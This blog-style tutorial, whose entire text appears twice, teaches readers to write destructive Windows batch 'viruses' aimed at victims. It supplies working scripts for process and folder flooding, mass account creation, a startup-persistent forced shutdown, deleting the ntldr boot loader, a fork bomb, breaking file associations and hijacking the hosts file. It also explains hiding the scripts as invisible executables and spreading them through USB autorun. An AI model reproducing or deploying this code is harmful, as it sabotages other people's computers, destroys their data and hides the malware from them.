Batch Files - the art of creating viruses
I could just you give the codes to paste in
notepad and ask you to save files with
extension .bat and your deadly batch viruses
would be ready. But instead of that, I have
focussed on making the basics of batch files
clear and developing the approach to code your
own viruses.
What are Batch Files ?
Lets begin with a simple example , Open your
command prompt and change your current
directory to 'desktop' by typing 'cd desktop'
without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter in
folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy
these three commands in notepad and save file
as anything.bat
Now just double click on this batch file and the
same work would be done , You will get a folder
'x' on your desktop and folder 'y' in it. This
means the three commands executed line by line
when we ran the batch file
So a batch file is simply a text containing series
of commands which are executed automatically
line by line when the batch file is run.
What can batch viruses do ?
They can be used to delete the windows
files,format data,steal information,irritate victim,
consume CPU resources to affect
performance,disable firewalls,open ports,modify
or destroy registry and for many more purposes.
Now lets start with simple codes, Just copy the
code to notepad and save it as anything.bat (I
am anything you wish but extension must be bat
and save it as 'all files' instead of text files).
Note: Type 'help' in command prompt to know
about some basic commands and to know about
using a particular command , type 'command_
name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the commands
when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different
applications like paint,notepad,command prompt
repeatedly, irritating victim and ofcourse
affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would
generate a positive no. randomly. So this code
would make start creating folders whose name
can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating windows user
accounts whose names could be any random
numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and Settings
\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings
\All Users\Start Menu\Programs\Startup” //
these two commands will copy the batchfile in
start up folders (in XP)
shutdown -s -t 00 //this will shutdown the
computer in 0 seconds
Note : Files in Start up folder gets started
automatically when windows starts . You should
first two lines of code in every virus code so
that it would copy itself in startup folder. Start
up folder path in Windows 7 is C:\Users\sys
\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
Everytime the victim would start the computer,
the batch file in start up would run and
shutdown the computer immediately. You can
remove this virus by booting the computer in
Safe Mode and deleting the batch file from Start
Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option-
>View
Now Uncheck the option 'Hide operating system
files' and check option 'Show hidden files and
folders'. Click apply
Now you can see the operating system files.
There is a one file 'ntldr' which is boot loader
used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and the
windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear
system file attribute, read only attribute , hidden
file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will not
reboot and a normal victim would definitely
install the windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage
zero
This code creates a large number of processes
very quickly in order to saturate the process
table of windows. It will just hang the windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command associates
extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype like
extension ‘exe’ is is associated with filetype
‘exefile’. To see them, just enter command
‘assoc’ in command prompt.
Above code changes the association of some
extensions to filetype ‘anything’ (means u can
write anything) which obviously doesn’t exist.
So all exe (paint,games,command prompt and
many more),jpeg,png,mpeg files wudn’t open
properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:
\windows\system32\drivers\etc. We can place a
website and an IP in front of it. By doing this, we
want our web browser to take us to host located
at that IP when that website name would be
entered. I mean request to resolve IP of website
is not sent to Domain Name Server(DNS) if the
name of website in hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:
\windows\system32\drivers\etc\hosts //this
command prints or add xxx.xxx.xxx.xxx.
www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com
with IP address and website of your choice. You
can take/redirect victim to any host located at
specific IP when he wud try to log on to specific
website or u can simply block any website by
entering its name and any invalid IP address.
Viruses we
just coded
Note : Most of the batch viruses are simply
undetectable by any anitiviruses
Tip : Coding good viruses just depends on the
DOS commands you know and logic you use.
Limitations of Batch Viruses -:
1.Victim can easily read the commands by
opening batch file in notepad.
2.The command prompt screen pops up,it alerts
the victim and he can stop it.
To overcome these limitations,we need to
convert these batch files into executable files
that is exe files.
Download this Batch To Exe coverter from here.
After running converter , open the batch file
virus , Save as exe file , set visibility mode
'Invisible application' , than just click on compile
button.
You can use other options as per your
requirement.
Spreading batch viruses through pen drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual
batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the
autorun.inf will launch anything.bat and
commands in batch file virus would execute.
I could just you give the codes to paste in
notepad and ask you to save files with
extension .bat and your deadly batch viruses
would be ready. But instead of that, I have
focussed on making the basics of batch files
clear and developing the approach to code your
own viruses.
What are Batch Files ?
Lets begin with a simple example , Open your
command prompt and change your current
directory to 'desktop' by typing 'cd desktop'
without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter in
folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy
these three commands in notepad and save file
as anything.bat
Now just double click on this batch file and the
same work would be done , You will get a folder
'x' on your desktop and folder 'y' in it. This
means the three commands executed line by line
when we ran the batch file
So a batch file is simply a text containing series
of commands which are executed automatically
line by line when the batch file is run.
What can batch viruses do ?
They can be used to delete the windows
files,format data,steal information,irritate victim,
consume CPU resources to affect
performance,disable firewalls,open ports,modify
or destroy registry and for many more purposes.
Now lets start with simple codes, Just copy the
code to notepad and save it as anything.bat (I
am anything you wish but extension must be bat
and save it as 'all files' instead of text files).
Note: Type 'help' in command prompt to know
about some basic commands and to know about
using a particular command , type 'command_
name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the commands
when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different
applications like paint,notepad,command prompt
repeatedly, irritating victim and ofcourse
affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would
generate a positive no. randomly. So this code
would make start creating folders whose name
can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating windows user
accounts whose names could be any random
numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and Settings
\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings
\All Users\Start Menu\Programs\Startup” //
these two commands will copy the batchfile in
start up folders (in XP)
shutdown -s -t 00 //this will shutdown the
computer in 0 seconds
Note : Files in Start up folder gets started
automatically when windows starts . You should
first two lines of code in every virus code so
that it would copy itself in startup folder. Start
up folder path in Windows 7 is C:\Users\sys
\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
Everytime the victim would start the computer,
the batch file in start up would run and
shutdown the computer immediately. You can
remove this virus by booting the computer in
Safe Mode and deleting the batch file from Start
Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option-
>View
Now Uncheck the option 'Hide operating system
files' and check option 'Show hidden files and
folders'. Click apply
Now you can see the operating system files.
There is a one file 'ntldr' which is boot loader
used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and the
windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear
system file attribute, read only attribute , hidden
file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will not
reboot and a normal victim would definitely
install the windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage
zero
This code creates a large number of processes
very quickly in order to saturate the process
table of windows. It will just hang the windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command associates
extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype like
extension ‘exe’ is is associated with filetype
‘exefile’. To see them, just enter command
‘assoc’ in command prompt.
Above code changes the association of some
extensions to filetype ‘anything’ (means u can
write anything) which obviously doesn’t exist.
So all exe (paint,games,command prompt and
many more),jpeg,png,mpeg files wudn’t open
properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:
\windows\system32\drivers\etc. We can place a
website and an IP in front of it. By doing this, we
want our web browser to take us to host located
at that IP when that website name would be
entered. I mean request to resolve IP of website
is not sent to Domain Name Server(DNS) if the
name of website in hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:
\windows\system32\drivers\etc\hosts //this
command prints or add xxx.xxx.xxx.xxx.
www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com
with IP address and website of your choice. You
can take/redirect victim to any host located at
specific IP when he wud try to log on to specific
website or u can simply block any website by
entering its name and any invalid IP address.
Viruses we
just coded
Note : Most of the batch viruses are simply
undetectable by any anitiviruses
Tip : Coding good viruses just depends on the
DOS commands you know and logic you use.
Limitations of Batch Viruses -:
1.Victim can easily read the commands by
opening batch file in notepad.
2.The command prompt screen pops up,it alerts
the victim and he can stop it.
To overcome these limitations,we need to
convert these batch files into executable files
that is exe files.
Download this Batch To Exe coverter from here.
After running converter , open the batch file
virus , Save as exe file , set visibility mode
'Invisible application' , than just click on compile
button.
You can use other options as per your
requirement.
Spreading batch viruses through pen drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual
batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the
autorun.inf will launch anything.bat and
commands in batch file virus would execute.
No comments:
Post a Comment